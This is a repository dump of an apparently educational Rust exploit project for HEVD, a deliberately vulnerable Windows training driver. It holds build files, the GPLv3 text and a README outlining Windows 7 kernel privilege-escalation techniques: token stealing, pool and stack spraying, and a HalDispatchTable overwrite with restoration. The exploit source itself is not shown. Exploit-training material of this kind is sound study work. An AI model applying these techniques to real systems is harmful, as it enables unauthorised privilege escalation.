├── .gitignore
├── Cargo.toml
├── LICENSE
├── Makefile
├── README.md
├── hal4_resolver
├── Cargo.toml
└── src
│ └── main.rs
└── src
└── main.rs
/.gitignore:
--------------------------------------------------------------------------------
1 | # Generated by Cargo
2 | # will have compiled files and executables
3 | /target/
4 |
5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries
6 | # More information here http://doc.crates.io/guide.html#cargotoml-vs-cargolock
7 | Cargo.lock
8 |
9 | # These are backup files generated by rustfmt
10 | **/*.rs.bk
11 |
--------------------------------------------------------------------------------
/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "hsploit"
3 | version = "0.1.0"
4 | authors = ["user"]
5 |
6 | [dependencies]
7 | byteorder = "1"
8 |
9 | [target.'cfg(windows)'.dependencies]
10 | #winapi = { version = "0.3", features = ["winuser", "processthreadsapi", "securitybaseapi"] }
11 | winapi = { git = "https://github.com/retep998/winapi-rs/", rev = "a7a82aa", features = [ "impl-default", "winuser", "processthreadsapi", "securitybaseapi", "minwindef", "winbase", "winerror"] }
12 | kernel32-sys = "0.2"
13 | psapi-sys = "0.1.1"
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | cargo build --target i686-pc-windows-gnu
3 |
4 | clean:
5 | cargo clean
6 | rm Cargo.lock
7 |
8 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | = HEVD Multi-Exploit by m\_101
2 |
3 | == Introduction
4 |
5 | There are many exploits and write-ups for the HEVD training driver,
6 | here is another multi-exploit.
7 |
8 | There is a lot of documentation as how this driver can be exploited,
9 | so I will not expand more on that part.
10 |
11 | However, the goal of my release is to have a Rust example of using C calls
12 | and that yes you can code Windows kernel exploits without leaving Linux
13 | for compilation and not having to install Visual Studio.
14 | Another advantage is that the generated binary is self contained,
15 | no external dependencies are needed for the exploit but the binary itself.
16 |
17 | Other aspects of this multi-exploit compared to the published ones are:
18 | - A token stealing payload written so it doesn't BSoD the OS since it increases
19 | the token reference counter. Yay, infinite successful exploitation.
20 | - Arbitrary Overwrite : HalDispatchTable+4 original value is restored after
21 | privilege escalation. The hardcoded offset used for calculation is specific
22 | to the Windows version I developed the exploit for.
23 |
24 | Fixing what has been corrupted is extremely important in order to have
25 | a crashless exploit. I will detail the "algorithm" to resolve the original
26 | value.
27 |
28 | == Pre-requisite
29 |
30 | - Install rust toolchain : https://rustup.rs/
31 | - Windows 7 x86
32 | - HEVD
33 |
34 | == Implemented payloads and techniques
35 |
36 | Payloads:
37 | - Token stealing payload that updates the reference counter of the stolen token
38 |
39 | Techniques used:
40 | * Windows 7
41 | - Basic kernel pool spraying based on Event objects
42 | - Kernel pool overflow corrupting the TypeIndex field + NULL page crafting
43 | - Stack spraying using NtMapUserPhysicalPages() (thanks to @j00ru)
44 |
45 | == Dynamically resolving HaliQuerySystemInformation
46 |
47 | You can use a PE parser and Capstone to do the job.
48 |
49 | HalDispatchTable+4 contains the address of the HaliQuerySystemInformation
50 | function.
51 | In order to dynamically resolve its address, you can use the following
52 | algorithm :
53 | - Open/Load hal.dll
54 | - Resolve HalInitSystem
55 | - Following the proper jmp, this will end up jumping to HalpInitSystem
56 | - Follow HalpInitSystem code until you stumble upon the HalDispatchTable
57 | initialization.
58 |
59 | There will be a pattern looking like this:
60 | mov dword ptr [eax + 4], HaliQuerySystemInformation
61 |
62 | Now you have the RVA you need.
63 |
64 | Add the HAL base to that RVA and you got the address of HaliQuerySystemInformation.
65 |
66 | I have implemented a PoC of that hunting algorithm using my custom PE parser,
67 | I won't be releasing my PE parser code but you can use goblin to do the same.
68 |
69 | == That's it
70 |
71 | Hope you enjoy reading the code.
72 |
73 | Cheers,
74 |
75 | m\_101
76 |
77 |
--------------------------------------------------------------------------------
/hal4_resolver/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "hal4_resolver"
3 | version = "0.1.0"
4 | authors = ["m_101 "]
5 |
6 | [dependencies]
7 | # custom
8 | bingrep = { path = "../bingrep" }
9 |
10 | # disassembler
11 | capstone = "0.3"
12 |
13 |
--------------------------------------------------------------------------------
/hal4_resolver/src/main.rs:
--------------------------------------------------------------------------------
1 | use std::fmt::Write;
2 |
3 | // binary file parsing
4 | extern crate bingrep;
5 | use bingrep::Container;
6 | use bingrep::parser::pe::PeFile;
7 |
8 | extern crate capstone;
9 | use self::capstone::prelude::*;
10 | use self::capstone::arch::x86::X86OperandType;
11 | use capstone::arch::ArchOperand;
12 |
13 | // XXX: Write code to handle 64 bits
